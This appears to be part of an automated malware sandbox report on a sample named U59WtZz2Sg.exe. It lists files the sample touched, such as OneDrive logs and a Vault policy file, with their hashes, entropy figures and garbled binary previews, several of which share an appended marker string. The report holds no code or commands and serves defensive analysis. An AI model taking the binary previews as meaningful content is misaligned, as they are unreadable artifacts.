Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	7.138979461263439
Encrypted:	false
SSDEEP:	3072:7hKTeY916s8/xZyMiSmRJhHNZlt/CF52TEeny25KiVfJSlqbQCge6:1KTem1u/xZyMiSm9baF5GEb25KinSlqS
MD5:	2389789B9EA7113AEA265A7A4E69843E
SHA1:	0951DF9CB0BB5497A6F42379533D677DE0316DC9
SHA-256:	5EFD88A10AAEC9DC6BFED45643DB3B97949009CE6B68D06ADBDD456406641F30
SHA-512:	F4F27381C73E492BA1B20CF18883FA7819A763C4478D47200FEA7E2D48FB43BED45274CA407ED2A94350B4BAB780F88A21DCA94C8FBFE9B26B3C34F44A0BE4E7
Malicious:	false
Reputation:	unknown
Preview:	0.7./.ex...cr....a+Ve.M.;3.i.2=XE......f.h\S.G.qY.].O!).h...i...[...w./..E...$..._.F..9...d..U;.NlY.5.S.v..y..=.....6.>..R8F.G...z.[."L...9^..\|..$..bE...t.m..Plo..3..)..\sZ.Bk.G.._...... ..X]q....-...&D...H.BC4.J...}.$.. p...?..{.a}V...H?.....\|.4$...<.ubF..U.....+Egn.C?...y..Ic].G.p.=.....;.._?.(..#+.>..e.z{..K. ).....z....W.D/.6. ...nTK.<...W.I.........g..J.g.JR..3.uM.#...6<..^.Ep..I..)....4...V-.w...\0.`..}s...rk..?.-...&...x....%4.........i..L...>..5.Ab.Ib...\|..].....\..T.y.....2(%...$\S.@.\..\..{\|....@2(\|...F0 gI........9.>.->..?.;[...o.^......30q..M6N.......{...Z.....Lj.vE(..?.Y@.}.K3....Yk9..zk.U.....J'g.A.t[.[..V..x...........>......b.<.....(.C.N..X....-AN.T`......g.agF...PU..a&\|\G$..1...d....B@DS.....\....X....WMbg.`..u..S`x 9^.............C.h2.f. ........c....It.h.Z@4\|..\..b.E.>..hY..C`.].Y...!x..+....A.~.....e.xh....{..t..X..MW.s.e.V....}..4...(.T...bZ.Xh."...#..j... .yg...3{......Gui.7k.8.+..v.%..F?...u...K#{.2.2[.K..y..B2...

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-08-26_080035_1794-1798.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.571803176823839
Encrypted:	false
SSDEEP:	3072:ke49PrcoXyX3uY7mGCXaZn7bTMIZl6NBRuj:keP6yX3tCGCXEPqRu
MD5:	F8B96E6BB6012EE139F1AA372814B15A
SHA1:	5E99C189F3C4B01044741E452955C712C0898089
SHA-256:	387677386992EF839ECEE48FB1B3D7F38489D349AE0C257036AD28399B9F0826
SHA-512:	4F7E7EF97BD68BA2F3C6F15AB03FB1EA4E11125592555C831B185252077BACBF4303780F29A5DDB96BC0492B5813CC7B51A3F1F18054FF5FE6C71D6DD6CE695D
Malicious:	false
Reputation:	unknown
Preview:	0.8./.J.2m.L....V7.q}...............w2...N[....N.............o.3....y...F..us.~...H.5E.......+.I.L..$1...\|.......%. :.....Q..y.....&.s./.G'.. ............8=..(..!.K......W.....HNX..s...P`./....V..k.2.#F+...M.f.M..N..$g.....P..B.Ly.\|.?..y0..s{..WA....u.1;..Z.H.'..S....N.Z.....#.....#Q.I!..K..O].azc..z\.g...F.O...N..-...@....U..!.A.xnK...++.m..9.m.....r./.....c.........J.=.................n..@...>.w....L.{&7...c.G..pQ.G.x;<ew.u.....Ve*.(..-'Qy........~..N.../.U.}.Xb...X.?..h.nZ.{k.[...a4.?..^.C.........:.{P......F...V.&VSy..B_..v..8...x.....ey81up/.8W[@....._.....&/K..]M..J.....\|..?R..+...+c..+L.4..s>^..Q.....I.....i..q..-q.6..;.cM.0.Y..._K...o..aY.F...(9Mp.b....i.......J...i)..Bp......TQ?........&.B.J....`L..{..q...,.._..r(....r..V.Us.Z....3L{.B . q.-(A.-...D....}...\.Q(I.......tl......_.T.N~.....s..]e.+[.h.~...z...gZE.:.f<.qLqvu.A.9;.'_pB.CqH.....P..,.:...m.kUV.h.s5....IB...,.#...&7..~..........3....j....a...EL1.\;.aSF..

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-09-30_074451_11d8-c6c.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.571816487181933
Encrypted:	false
SSDEEP:	3072:FAFpYQfSfZjqidP63qLkpwCdhNKvNfvmmIzVEIqT:FALfSlhdyDGCfEvtvmTzVZI
MD5:	F4831E3C57671D3D6A0B0FFEAA180506
SHA1:	F9E1B6A28A5FA039C88904A997845028E9CA243A
SHA-256:	87D65DD106BA66D32E588DFE591E041604F8A752043E12F98DE039C5617657B2
SHA-512:	CF475B4738079099017C6C120081A50BA9761A46205628F8C6C1A16F6B3D009FF1AC38C0A25E6BEC2245E4A5427A63302BFEE4EEDDCB228F68481B9C4A223121
Malicious:	false
Reputation:	unknown
Preview:	0.9./......]..9...j5...{.hTJ3.e].['..+;u./G...\Lm..c.1.lV.q....rt.B...h..{._.j....+La...Y.\|...X\|....d...o.....s:.#!..86C.....u..a3.u....u....w.a...R$...F.m(Q..C.\|J.......=&.D.m.k....7...R~?.".........b.....8...~.H......%M.\|.[..(C...q..+...f..!L....=R>..V.].Q...T.u<..[.'.^...m.w..o.n..0.a..CP%..~...m#.$..x.a..w......o.-....K....Ep..ZjM.>......`n.T.'.n.?.%..@.0!..^..u....8.^^...q&<..- u..x.......!...>r.g.K...R...........b ..J...;....+...f..8..o..0...~Ax..Kzz;@pn..[L....LeA..(...Q.Q....7.n...f.._!t..v......d..........{.{.........n_. .3..(....Z4..y9.(Gi .H/.r....E..E........H.....HF...,.`.L.[B1S{m.-.."K..u......r.6W.1O../..z...&O._m9.q....D.{>+...&.T....V)..gb.KK.....Y........1..!.~.,.l..E..:.V. -9w.F3...v.....0D..._.....1.C.c..w..x.Q..Q...R.E.jr...Qs.....31....B3].=Q9`.......g'..fxm..GY@.(.....6S........O.R2p8...T..pm..t....v.89.h..m.\|......K.X.........O.N.u46_$.!Cs...iX..L<....Ok..Yp..5.9..oDn k..K..\|....~[.] aM.5...X........

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-07-27_073928_f5c-16d8.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.536799305555556
Encrypted:	false
SSDEEP:	1536:hcRFD8ajvBGRsdPFnYBq5fBFBqnSj7w10uwII/jf3+O62NNezCxOXC1PW7Qw+jLC:hlUBNLnYUtBFoSztr3++1PYQ9
MD5:	76EB9B70EC1BADB253D8D1105E6101B5
SHA1:	37B9D58F41E49010C65C728C3788ED9D12077E30
SHA-256:	D95AC66F7889D22622C79A6ACD1BEA21CCF4D68AA38A7916F8E13BAB071DDB36
SHA-512:	10CD42A5F3978FBDBDD2C0B7F3201BBD2507B394EE2D0304876B37DA540B3935B266BC73937428423B73AD9C04FD5BC41DE275269C5FB64DAB48DBF32021D64C
Malicious:	false
Reputation:	unknown
Preview:	0.7./...%o.0....\G........H..4...@?.ZE.Y...:ml...Oy...._..fI.q.c..~&E.rnp=.qD..C.}f..!...n.....z..zb(.1.a\....S..O;3./.W.........v...p;...cHo...u3.;..OpU]..b1.... .u..e./............\S..lr....$Z..I.........".R.rB'........Q.?i./g...p.I.E.5\|........7..{.D...?....4....IW....{...c.-;..S...$dX..0H-;.D...Hp.vT.3+.V......C.rT]..XP.A3...fbG..}:6(0.l..:..2.:...I%z../>\..."}.H).=.,..[.'..>..W..l.U@wuP....f...t.........".\|...q's......!.q...-....MV..F.m+p..#.z.....N..DC.Z.smA.Y.@^.~....\.....15_..`v..2.......&... .{J...x.;@3...9k.F.}...o..[uUq=.!n..a....pG.I.v}..AM....[N\|..1.\).lp.+M.....3\|'....">+.6G..c.0....P@.be...Y..oYxy*1......`..2....%..l#_e....#.,p..jr.....OZ.(.....R;....ZE.p...x+y.\%.v8"J{6....U..%.QoP..K8..9.I..w..kk.".(.2W.....`..'..y%.z7.m.E.3U..;.Fy.......P5....,....I.i..p.O..9m4....`..L.pIah....14.D9R........Q'8/....{U.\..y."...iZ8e.>^u.......M.(.w30....^.];..a._..{..}.(.g...d......lT.......V.`. .z.D..<.R.#......~.&.H..}'.>...s.Moo.8..h.B

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-08-26_080034_1748-11c4.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.55673744252653
Encrypted:	false
SSDEEP:	3072:6niQWkOwrWJ/WwEm5MwcC7MJGZry+DSy2JO0:9QWzw6Em5blMJGry+mdO0
MD5:	F841DD2D7A3D64EA472669E77298E921
SHA1:	B0EF1BD5A801D39AC64C951144E6B1281FABC5F1
SHA-256:	93DA23FA6BEAF3AF6DCE47BB67C4F3F8B7A4FB7CD42499E5291CDEC828317474
SHA-512:	031273EACB072E46653CC6F5DB1320246EBE60510B5E6DB99A0D6F1820799E81910F4E7CC2F9858082C48D34D0C7600B31FB40F837D44883CCE7E1F69F9AD817
Malicious:	false
Reputation:	unknown
Preview:	0.8./..7BJ.m#..j..)q?}.&.Y...&.\|i.s.(...j.Q.P..O_L..u...#F....`.8.%....8#..^jVh.R..v.o..}.`...P...<.?.HpC./X&.N/...v./.{+U4...HP.^+r.L.8..... .IR.^....=4...AG.=)...<.a...z.I.?....s..tk.a.'l.'......67...h.....P..M>hy. ."}...;.v..5.GuX..V.Z7.D.@..~.=.8`m.'.....2....JC$..9Y.{......>......V...\Ao..bCE.3bI....N....[p'..}.+.0.}Tq.&.:.XCF....&.....w0..m.s...y.s..B..DBQ.v2C-.....`.iG.o`...a...0.TZ..#+k.E.;S...f\\|a~....a.1..........x^>j......H..R3N.q,....C.........~...v..E(S.@Ch.E..0l`.z.>V..%z...H.F1.G..ok...I....`.S..f..J93......?.9.v,.k..Ug..,.\&JM..;.w...:.`"G.b.0.....h.......`.,....L...h#. ........>&.. ........E....+\...n{44D&....... ..........{.....H.E..\|..i.W.8.Kk0`.g.;.T.S..~..k...a...:.wC...q.....e..e...m_2-f. ../5.P4.W5~6......V9[L.M./>.=.e....P.w0.T.+...l.[1..U{JG...8...a.s..."B...iZ..d...E....v.2...<....\A......V\|s......K...3..k...'5..{.G...pI(...'.J...%...No?%.F.%...u..sW....u.S..v.1..I.....l,....._(2.A..YEJH..........d..M.7...

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-09-30_074451_2bc-160c.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.5578964572633405
Encrypted:	false
SSDEEP:	1536:3D7PI8YYYSd9GXBLeIihIWT34YOzM86Ch53EvmrCYJDfVOpEk2JWu8f8U:Q8YYY0IliIWMYYMIhBEvLIDTt
MD5:	9D819A5D259036C67A6C3FBF93204FB3
SHA1:	2A3703485D96FA1AA97A5DCF4F5AF127B786301E
SHA-256:	7643B0C7835F84B7ECF5A2F2CE27802261DE407B24D7ABFCA83C32B1540920A6
SHA-512:	CB08D2979450E38F92CDAD34B16469C9832E93CF8A0A5DB65C5813CD6BE3B7087233BBBD8965BE53482D18A99C18D52C77CFF18D6D6AB05C98DE474312F6D26C
Malicious:	false
Reputation:	unknown
Preview:	0.9./.e.....j.7..AR..{....#B.DL .).g.!.3O......s\.......].y~Q.3.%...$3.~]..yD^...c...{.c.b..y2.1Kn......Z.^.a...P.T..'b.b.@........lyT..?....$w+e.7.L.'1._.?....s@..d;6@..9=?kHe..Bhqic....TxJ.....~..H$.JG...).....o..4...ssp.@.L{.....R).G...Xm...QV...RR...,q...&Z...........UP.{O&....)B.C.5.K./k.=%..2.)...U.bMb824....1...6.....q....3~E...nO 4=.fxA5.[....r........p..ye...3.L.+.....1Q..R.!.....,.).....d....5..j?X......U?h....'...+.Q&.m..c.....6J...>....0..........W.\|[X6..\..o......E..3.!...o.br.'F........KwB...H..}.A...=..t..r..a...1}.X....<..F.sO.&...4..Q.=o.Yn.#.U....N._..~.....p.@.-..4.D^v..I!...%.TArn...e>...~..^.......u+".X.[.-.. =.'3.,8.B.N..L.6....0[al.......&.=}..m\|..........jz.9R.._...c.pf..p........t{N.7.:.....6.d..y.#_kT..;1{m85..l....d..H2.8./b....^2..\..6..\|4.1.G..$.g.....aW..6G..L..}...sL..2..G...G.>]z...E....C ....H..t...q.Pa.].FD.@.{}...C[{..&.\|.......65.$.........R.....a4.D.B!....^...x=...OGF.s*8B.'aI..P......F.5]..t#..U

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_113559_1bf4-37c.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	15322
Entropy (8bit):	7.986003241562136
Encrypted:	false
SSDEEP:	384:C4k++gnMIOzRiDz9MudQeh1teCR38kXIlixO:C4WgnM7YDBM0r1teCZOcE
MD5:	A3E263103D6CA0EE0B891E8EE6E6B46A
SHA1:	67EF97D50F3D2C942B5E378D2108AAB31EC8216B
SHA-256:	EEB651FBAFEA8EF912093AFEC2E4CBEE27E639E28DC6D0A3D7962D1A6807129A
SHA-512:	97DB5DB6813907B73CFF66D49293D53648934B89C2A59467E30CB30DD8635CAADD1C3FEA44F5DBFAA8532BD581A5245BF77B21ACB0B32994CFDC8011E4ED68BA
Malicious:	false
Reputation:	unknown
Preview:	0.6./s.s...%.kf.................5O......Z.qf...})......Y\...v{....x.vX...du.?.Nhs>.,......vJ.PT...&.[-...Ql.l......v...6wm......V...y..hY..e.....m.EXc...=.`...'.0R..Gn...\.U,.Z..C.K..=T...\....O...........A7:[.uP=Y."I..@f...0.n......0...b..........8.li.M.p...g..e..1R.. .\o1...5....f...w.m.!L...N. $.t...m..:{.fs.F.........5.<..xs.Q..4x.;.v..T..#...t~.%....f.s3....pL8'..J.....x..J..Z...?8.`.{$o..%..........xSl.w Ot..x."........t..]..K.}.Wj.c...Hk..\|..~!4..E`.p...-Lm.../...F.....G.;+.m..Z.\|i3K...w.....f.7j... {.)qh.iB...z.C=....y^K{>S..@..zK$@&.7..Qz...X.M...-...6.> .T:.. \..r.............>2.&kO.Q............?o..2..<x..vO...3V,y..WBRy.=..dUd.h_..%.ie.OHM\N>.WL.I^.y6p.Nh.d....T..Q..?.OU..~..c8.I@t..Z.eASV..v..O.u......3..?.._).H.nUc....q..4!./l.Y..(.$M.g....d.i......m.O.Z.."......'q...............k....Y..m......?J....V.q.....$.+%....)...?.`p.....,9..j.k..T...B.X....;a.d.....M...l8U.k mh.t..L...r..A...m@....'H.......N......?t<!..]nC2

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_113735_d88-127c.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.23152413841375932
Encrypted:	false
SSDEEP:	24:6xoXB8fCTJ8t6OUjGbwkhVX57ov8W8pgTsOOAD8bz:amdAVVX2z8wkADWz
MD5:	B681FF78CCCF5A05197917328F6AE6FE
SHA1:	28B456D3B550BCCDDFDEAD792BA77B26E602D375
SHA-256:	A234CEE5953F4B383814733FF84239BAD6444520969002A3183EE47021079934
SHA-512:	C2A3F17517A8F624964CDB2776B1240271106ED0F5F6944E885E57E661433FC876ED3929A652154D6F28D779EC4AD43B3CDB52DB0B7A5053BE9AD22B2A228F35
Malicious:	false
Reputation:	unknown
Preview:	0.6./.s.....!....)....0Q......IN..O...w...0s'....V.z.X...U..<:(. ...j.9..>..S.....F:O.@....E....HD...V..@t...6...K.....7...B_.W;...x....h.1..M..Qb.m^.L.#3-=>=.f..P..l.SW.~..D.r.K..F..E.i`0.-:"..1.[S.T.>...f.....wF..Q.FE.y....6>..S. .0..Fo....x.....8..<......6......a..j_0.....kc..~...3.]W...Q...R.vqL.h..J.6h..&.R...uL....F.K....\|I.......K.b....r...#..g.c...d.A.......{}.K.e.....qK.._D.Q......@....c.d..'....m..w.U..7@...x...[.@.....C.A....92..hI.\|.......L\|....s.;?jGB.:BG.t.^..p.%}..w"....F.....UZ ..T.........y...fc.S.4aZ.....T].@..:>S.A.....<>.$]..P.H$....d..+c.H.{.H...n..!..H.]-Fi.L...JgJ....k.;...j9....;.:Ga........?LND.L.....p...;>.X1._.9.y. .^. .*..N\.nd...3......C.(..o..)-..3w.._r....[..A......3...5...j..^..p{HQ......_.8.l.....q../R..o..E$q.y.fL..+.....^.6...G`?K^q..5-5......#..G..;j\|........oU..i8d.5....7..`.PoE.................o$a.B.F....?y..B..b.;.@K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2020-07-23_101959_1494-1498.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.921721214507744
Encrypted:	false
SSDEEP:	384:F+T1T8v0febCIo97JFpTCLdAkYcWdGnPpg68BR3:WT8IcCXzFpTwdjYcJO6
MD5:	B647240DE4C2A34922F39549615C8494
SHA1:	8CAC89EB6CA52DF02EDAB3034FB0FC20B09F3ABC
SHA-256:	85F6FAF912B5763FEC56D7A724A62E38A097485B35F500D8B351560C206E2B4A
SHA-512:	FA7B6F82B65BB60262CD11F91E83A61D9C33352CD23918E55F0B1307B64EF2A9D70A6A0DA684EABB5DB8B17E697BD03297AF3C07A1D088A0A292CCABA66C2922
Malicious:	false
Reputation:	unknown
Preview:	0.7./...I...t....E.q..\cvF.L`.7..$."L.+.ab....E$v.m}..e..Y..#T...........1>........~.....'...v(.B...A..Dl.2Y..E.s.X.(o.~o;88.L...c.-..........S.v..r0.8.........T.>.Iw%.FT.I.....U.."5..c.2......wa..Z.......l....E'.&cj..o>....Y.84..Q..<.<D...e...L...y.n:...$....U.5.....az..........f.K...V.1E...Jw.a\P..N)t}.A...OF./.[Iy....:.....;..gJV.3.m.\|pZ....V.)\|.7.....[n#S.!........7.j<....C..L......}Vlx.[5R..`......<NPO..>[.Mq..s4h.;..g.L.N:...P.1l....2.>...exv.Uv.oF...F.C{y}..,..P.9..;8$.W........5w..D..$..........;.5K....r.vN ...6..*...... .R.8..z..vM.....y..Y...H.h../F$.?..J..:...%hQ..... .-......I0..3.....)B..l.....J.....#9.)cm.......}Kh<{.B3>6......6..a.,.V].B.i..+...C%..{..L.K...k.........v.......{+..W".r..q......_XK..J...iu..>.p\-Vvp.9F.W/.OE.0.1 .v..x.65&.I...l.....Ds.._...U#+.9......Ud\..-0..&7\..\ ..+&..=.).....}.\|....)Z.f....U\.j^..].X...]...\....N....#Y..Y...%-aO.@.z..\...2.x..d.{4.....h{..R......B.. .1bK.H.`..%...b9...h..f..D....k.@.

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2020-07-27_073907_1630-1634.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5452024651211094
Encrypted:	false
SSDEEP:	192:K24aImmlaxwy/itRjz/VYyKhZdaUXXjxGcfc19TuUuP:LHoFy6t9ZYy0naUjMcfcTuZ
MD5:	2E4C086F53DFAE47E87EC23556A22EEC
SHA1:	28885221B7F207F28B86FB1075561441154572DC
SHA-256:	0E50EE7B89A621475B4E3CFF9892E2C0A1CBCD31BBBE00B62A8903C1E878E428
SHA-512:	879EA717FC2817B1CFB5ED50E9A88ABF8A510BD8902DD8864049EAF4429EDAD27628AE138D6CC7CEA727CAB7D3A4D6AEBFF97A93FD8A1A2A2300B7AC49E3463A
Malicious:	false
Reputation:	unknown
Preview:	0.7./.7i.l....TNH._..>.._..r.$..\1Mo_;.8.6..':..m9'<q.]...,.)~.......?.....P6...Yt.-..6..v.m...\..+2.w~.'.{=s...^Ao...L>P./O7.(i..+L.i.q.Y...[..(.0...a..f..".S...2.V2L...Q...+..5.ej.h.....$ESe.....k..!r.uI!..c..)....!...j!...8...[.9..........l,.#.flm.'#..z........G...C...2C......<.E...w..K..].....d..jG..j.Pc..L...2.00%...A\.;...}.....}......8-.......%.\|..6/=.)......P..a...TNW7+....QB9..l...)i.u@....,....O..Jf!.E.;+aW.n.qT.).nU.`....../.k3t..g. ...Qmb0<..{1.....O......v.....l...;.:.p$.....p........a\|.x.N..Y>.....]R.s.....4..s...z..V..Z9AD..?wP.P...m...RT_l..g....)...o~ZA.//.1....%k.].1..z=Q.&.T.=+....(J...0/.BdX..^......y=.e~.5I.lr.r...St....'R=.lJ...=...\.N..L.:...f6.+XS.........T..L..xH.q...#.._T....r......7....<.s...P.>..[..P..+!.;...a..v.3....&..md.o}...... .....IQdg..6..G....Z...........T\|P?....6.W....j.D;..x.T,.aI.s:..)...61Sm..&.....$..._#_.qK.p.v~.....J....].I.G.Y......:..3z.C.il.2.K:._..f.~1-.....7.+.....sK.\\._...U......sz....*

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.42715715178796
Encrypted:	false
SSDEEP:	384:QyFZ7qyMyvfW6tMON9vDHkcTeFzh4IGxedi06Ojv3zWFS6lhEtipAqEhdfCvdLUv:JZRHNJDNeFNty0nyFS6lhEQGdfCXFO
MD5:	126A1CE9E08C0A6A095E3E7F4A7E54EA
SHA1:	499A131394B493F20F89372E3AA93A9495761D6B
SHA-256:	AF3F6F72BA13C3F42875620ADBB9E6B6F3D00478BAAFD3BF6A1FAB6499834761
SHA-512:	7B47A00F402E848B9C4DFD8EB7E30BFF85DC5169F735E4B8BAF723F9F35E2E97435932D27045AD97C6CA7E14089F8CDD3A9E0A520006596738011AA98A9E8C5B
Malicious:	false
Reputation:	unknown
Preview:	SQLit...;.%.G.@.q.Z.8yPZZ.........O@..8...v.\.V[..'1X.......j..XM..R...-^.U.?.-...U\|....$Pnv.N.`a....6IN..._A.Hz.t.N2.l.;...?...-;. ..\|k...tt.T..R"e......6..:RR."<..J.Q/.... ...%...VF.....6-_.\|0.e.w..Q...k.Q$.1..HBm.CB.W6..-/]..\Y...O.E..(..R.q..a..1.8........>...Y.q..Uf:...rg...Rn@.....Nk...:j...o,U.x..a.....".n.J.j..........M_...:q.....fO..j...n...BT.cr...........2.+(.......G.u...'...G...V0'...-.A.......Z.B#.._...E/.'a.lU{w..l.-F..>..Ov..e:..w..X. e...\..j.bXH.....D.-n.gM....5..........@.j..Gf.@$./.............>.P(...).2:...&%..V...z.,"..Z....vB..Q.p`=.&t......l.&....X.e..$,.8'....hr.>.H.6."""rG....g.....eE.D..........hT.>$.8P.<...[../...@:.u.0Q@...\|..m../[..-^#e{.... 9pB 38..p2.+m....;.)...!..M..s.7pr... .....z.[2...) ."\|RDR.DU....Q#...)...+.*..$<..V...\|..... ....s,......Kc..B.(........b... ..h.,`+...;h...$.%...8..}!@.i..N..v..@.P........j6.Q.r.q.s.J.Q.+......G.....Qd..$..b...AT.. ~..kB..h......cS..">F8.z..w` .2(F.c...j.

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.4248929664416448
Encrypted:	false
SSDEEP:	768:NePuTLIilwRzN+31BAzroM3kohPnYic/q:1TkiqzwH613konYB/
MD5:	7B1786F4F57A496BF1D77765ADA50249
SHA1:	50E9D1717966B491CA65327733C5671D6AA1DDC3
SHA-256:	7591F24530525BFE3E9040587C5D129B7F9EF0606E5D4E791181F3FA30BD3BD5
SHA-512:	CC405C44BA94ACBD501D3B17200CA42363FC967B73150E028C21C1A12331A2727BFBE54E3620D722B50C62646791605C87B7D4D770D3B5997DA4B922D81639E6
Malicious:	false
Reputation:	unknown
Preview:	SQLit. .Z].......z...$R..9.t/.&.../.........%KS.t...g......-.&.u....=.^.Y.f;kw.g.d..;....i./..G.$.....]..z....{-.q.^t:...^v.n..:.F.\....Jo-4.vX....>B.&..".....4i....i...........W....)E.=W.+.h.KO.....R.q "5.M..$...5I..H_..);.......5...j.9........y.T(..w8. 1[8.>....Y...No1lNFpg.G...?.......3.... ...L......I?...9B..L..pAk...2d...?......)....n?.!...SvRq...Q.....f.......M9e....p...\|..F...Y..d.qB..7...4..n1..x....L..k..4_b.e7.... .....5O.^...?..?.....T.E...].w.a.......!y...cs-)In."av-_\|SQr....(3W.?..h...D.Q]...O.9...iu.1m#.O...UC.......\|..6!..!......:.......A..t.?.v..f.Vk..R.b7..I%,..(.T.NW....{..\|,.W#Al.K..$.U..>. ...2%. .X.e..^W.N......\s.......g~..).OU.J....d.....(.u.qU..T...n..~..>\|W..#v.qJ....R.+......#....-..........v.8.J....=.+.d..Y)(..(...^.z..[.f.Z....._va..ePC.X.j8y.`B+.....n)S...?A.V..[.h'.+...T.h.it.<U@.6.O.....<.1^...k..`h...R.MXZ.2....7e..3..c.m..?.u,..K}..!..b.zn...2Ny.z...D..ck...(6q...0.$"..zE.z...[....,.&=.. .*...5...

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1318
Entropy (8bit):	7.830644004392996
Encrypted:	false
SSDEEP:	24:YWKbJiFLbP50CFk2vxCVfTT/R0Ax+fin4oIAGosCwwjSDFO/HN4f3ObD:YjEBP7afP/fx+K4Tp7CwwjSwt40D
MD5:	8C5CB35F9030E2F7CFF03AA47A723D6C
SHA1:	D415F057CD92F8840FF9485B5FC8D53AEA0B1A02
SHA-256:	C6B451E8E5FEB09D3930986E1867462870DD60A603756A9029569CDBB8F39A44
SHA-512:	E4EE46421DBCE88777201A7374E3EF50CA97076B0EF74A9E15B295FAC4DEB452BC04CB9C317C5D95D8D39154A7333FBC321641EF0D383AC781C766E0DEE40766
Malicious:	false
Reputation:	unknown
Preview:	{"Rec...`. 7w...NY..qf..88.3\|.8...)...3.c~.c..0o....R.c\....\...j...!.......7...%.....{...F..#B.l..B...z9.e%..b..'%.!..,..l......c=.e0%Bu.p..O....)..W.K...i...)...0.c....Hb...C{ty..V.....cI.....#R..f.{<...mc/~.,............j.....RQ8~.C....i.-..XM'.......`.v....\|..s.u. .~...M.......NnR.z.U..3.Z....>gj.F..k.D<.}.J,...)zAz..=....3....c..\|}9S..pc...!..L..!.C..[...-.C.%..v.'}..c.$.......o}...".P......g..w....UGC.+JI.5...iTG..m.13...p......"E>.0....:..R...n....s...^<.WA.)......A=T....c.\|@.".7.sa......I.f...0.v..0..a.-.@.._/.....G.E..._.1.......t..[..B$...n`.$.....!.b..R....N.........:....=.;.3!>F.8s(.o.c._...:f...)...%..[...W.:....7.....S5.t._...s.M (.U).O.........`i.O.U....H..3...P0....I..@..GBq.t'Y....zE.e......Ga.a.fJ).<....P.HlK<...\|..5....a...\|...KV.....:.Aw.O....c..={......`.0.=I.5.1z...c..R...50.Y..)3kp.%5u.u...bU:.`.o?QK...m.(>i8l+..V......`3C..8.c..d..6o.\.....w.c..2.!L..sPsLMi..U.e~..a.....}i0...v.DQ>:..y.....EQ.q..8~....\1...L@....

C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	770
Entropy (8bit):	7.7429720740999075
Encrypted:	false
SSDEEP:	24:V1nLQCI3XTm4qsSaiiRmumafMJ8YUYTbD:V+CqYi3mzDhD
MD5:	DE832E3406D9641AF31508EFB96E302A
SHA1:	056AA3D910AACCA4BA775208CA73237204C839E6
SHA-256:	EFE66465A69106C50A449CEA69CD4B5A9CB2B0AC545B5162716E5081BED8748E
SHA-512:	8D1C408E244217C27950FF08DB3AB142015BEDB64B41EF1415DC2F5C6DA95D8F77BD023E396B7AD38F009A5EF3D6A4F4938A22B784BD679EBD8DE352BFFD8CEC
Malicious:	false
Reputation:	unknown
Preview:	....B..3...9.....4..p.:.s.2..O..U?:.g3;.....U..&...)d...u ZD.K...O'.d...[P.wS..m...0=Tj0Q...0.`b...,.Y..i..R....he..._.1.Qg.d2.V....lJ.....f.%.Yk.<..1E...<..>&x...D....9..mR..x .ly...~..2q.B..x+...~.x..vR}.........{..n5..I.t.D.7...4w....@e{...(.....q.b4A.L.Q..pS..=.L...TW....^Q.mE..h.I......?.Z?..{.................(..W.Mz.6.'.=...l....I'....3...A..9....Q...M....f.+..Jr].d,.....Q.1..9...4.gM.\.....F>J.....f....U.....>.G.s.....5..v.g;..Fj.....i.^na.e.SJi..r............%.8..[......f.YUg.........r...P..p]N..7U.Q.\|.i..6...\v.."......U.JA.7...<-K..^B]...].NT..b.}..u.q.y.!.f....1$(W..(;Ui........&.O)a..7Gn...<r..P.gd.'.[....0.un..&`.K........{L"..5pG.6....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_00.sqm

Download File

